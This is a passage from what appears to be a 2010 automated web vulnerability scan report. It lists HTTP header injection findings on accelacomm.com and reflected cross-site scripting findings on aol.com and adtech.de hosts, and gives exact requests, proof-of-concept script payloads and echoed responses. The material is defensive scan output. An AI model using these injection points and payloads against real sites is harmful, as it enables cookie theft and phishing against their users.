GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/b8f4d%0d%0a75caad6ec0d/51087634/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:09 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=b8f4d
75caad6ec0d
&Script=/LP/51087634/reg&
Vary: Accept-Encoding
Content-Length: 465
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.5. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8aeeb%0d%0a72b7a6572e9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/8aeeb%0d%0a72b7a6572e9/ HTTP/1.1
Host: www.accelacomm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3;

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 14:07:13 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=00019830002630CION8PY4MR9KO__ciost_ppw&Source_BC=10&Script=/LP/8aeeb
72b7a6572e9
/reg&
Vary: Accept-Encoding
Content-Length: 459
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.6. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 84af3%0d%0a1ba961655d8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/84af3%0d%0a1ba961655d8/1/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=84af3
1ba961655d8
&Source_BC=1&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 428

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.7. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 40b6a%0d%0acae5fdcb550 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_160/40b6a%0d%0acae5fdcb550/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:05 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=40b6a
cae5fdcb550
&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.8. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_160/1/51217035/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6060f%0d%0af949928b296 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_160/1/6060f%0d%0af949928b296/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=57c7f943:12cec784a11:-3759.92; Svr=svr.regwa3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:07 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_160&Source_BC=1&Script=/LP/6060f
f949928b296
/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 432

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.9. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bd5a3%0d%0a512870eaac9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jaw/bd5a3%0d%0a512870eaac9/1/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:00 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=bd5a3
512870eaac9
&Source_BC=1&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 428

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.10. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 555c7%0d%0a14034e98e3e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_728/555c7%0d%0a14034e98e3e/51217035/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=555c7
14034e98e3e
&Script=/LP/51217035/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.11. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jaw/btob_smm_728/1/51217035/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload dae2d%0d%0a5e4e4802f7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jaw/btob_smm_728/1/dae2d%0d%0a5e4e4802f7/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.btobonline.com/section/blog-roundup
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:05 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=btob_smm_728&Source_BC=1&Script=/LP/dae2d
5e4e4802f7
/reg&
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 431

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

1.12. http://www.accelacomm.com/jef/51217035/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accelacomm.com
Path:   /jef/51217035/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b6f72%0d%0a5c2db68553b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jef/b6f72%0d%0a5c2db68553b/ HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://www.accelacommunications.com/index2/lp/evolve_video_strategy.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa3; regid=57c7f943:12cec784a11:-3759.92

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Dec 2010 13:18:02 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=EMBED&Script=/LP/b6f72
5c2db68553b
/reg&/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 390

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 437 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75089<script>alert(1)</script>444453bafa7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media75089<script>alert(1)</script>444453bafa7/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Thu, 16 Dec 2010 13:59:18 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media75089<script>alert(1)</script>444453bafa7/getVideo] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.glo
...[SNIP]...

2.2. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53df9<script>alert(1)</script>d5a0bd145b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4481
Date: Thu, 16 Dec 2010 13:59:19 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[/media/getVideo53df9<script>alert(1)</script>d5a0bd145b1] is not a valid API call!","stackTrace":[{"className":"com.aol.global.util.WebApiServlet","methodName":"doGetOrPost","fileName":"WebApiServlet.java","lineNumber":82},{"className":"com.aol.global.util.
...[SNIP]...

2.3. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the brightcoveId request parameter is copied into the HTML document as plain text between tags. The payload b297a<script>alert(1)</script>bee90c4c596 was submitted in the brightcoveId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo?version=1.0&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId=b297a<script>alert(1)</script>bee90c4c596 HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Date: Thu, 16 Dec 2010 13:59:09 GMT
Content-Length: 11066

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"Cannot convert [brightcoveId] parameter with values of [b297a<script>alert(1)</script>bee90c4c596] to [long] type!","stackTrace":[{"className":"com.aol.global.util.WebPageContext","methodName":"getParameter","fileName":"WebPageContext.java","lineNumber":330},{"className":"com.aol.global.util.WebPa
...[SNIP]...

2.4. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adam-service.app.aol.com
Path:   /adam-services/api/media/getVideo

Issue detail

The value of the version request parameter is copied into the HTML document as plain text between tags. The payload c2853<script>alert(1)</script>82d0c915ecc was submitted in the version parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adam-services/api/media/getVideo?version=1.0c2853<script>alert(1)</script>82d0c915ecc&format=json&_blogsmithUserName=mobileUS&errorStatus=200&brightcoveId= HTTP/1.1
Host: adam-service.app.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 4710
Date: Thu, 16 Dec 2010 13:58:59 GMT

{"isOk":false,"callDuration":0,"result":{"className":"java.lang.IllegalArgumentException","message":"[1.0c2853<script>alert(1)</script>82d0c915ecc] is not a valid version string!","stackTrace":[{"className":"com.aol.global.util.Version","methodName":"<init>
...[SNIP]...

2.5. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9f878><script>alert(1)</script>1985d9d85ae was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=9f878><script>alert(1)</script>1985d9d85ae HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 263

<html><body><base target=9f878><script>alert(1)</script>1985d9d85ae><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=9f878><script>a
...[SNIP]...

2.6. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The value of the adiframe|2.0|277|75593|1|246|target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a546f"><script>alert(1)</script>9db0ee5cd0e was submitted in the adiframe|2.0|277|75593|1|246|target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=_blank;a546f"><script>alert(1)</script>9db0ee5cd0e HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 235

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank;a546f"><script>alert(1)</script>9db0ee5cd0e;adiframe=y">
...[SNIP]...

2.7. http://adserver.adtech.de/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764c9"><script>alert(1)</script>3b8de120b8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?adiframe|2.0|277|75593|1|246|target=_blank;&764c9"><script>alert(1)</script>3b8de120b8c=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 238

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank;&764c9"><script>alert(1)</script>3b8de120b8c=1;adiframe=y">
...[SNIP]...

2.8. http://adserver.adtech.de/addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6238a'-alert(1)-'f9d6fc88a25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank?6238a'-alert(1)-'f9d6fc88a25=1 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 276

document.write('<a href="http://adserver.adtech.de/?adlink|277|75593|1|246|AdId=-3;BnId=0;itime=507998761;" target=_blank?6238a'-alert(1)-'f9d6fc88a25=1><img src="http://aka-cdn-ns.adtech.de/images/AT
...[SNIP]...

2.9. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ddee'-alert(1)-'ae3f639f0a7 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=8ddee'-alert(1)-'ae3f639f0a7 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 579

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028844|0|889|AdId=2172450;BnId=2;itime=507892681;" target=8ddee'-alert(1)-'ae3f639f0a7><img src="http://delivery-media.surftown.com/avw.
...[SNIP]...

2.10. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ba5'-alert(1)-'dc232125ca4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

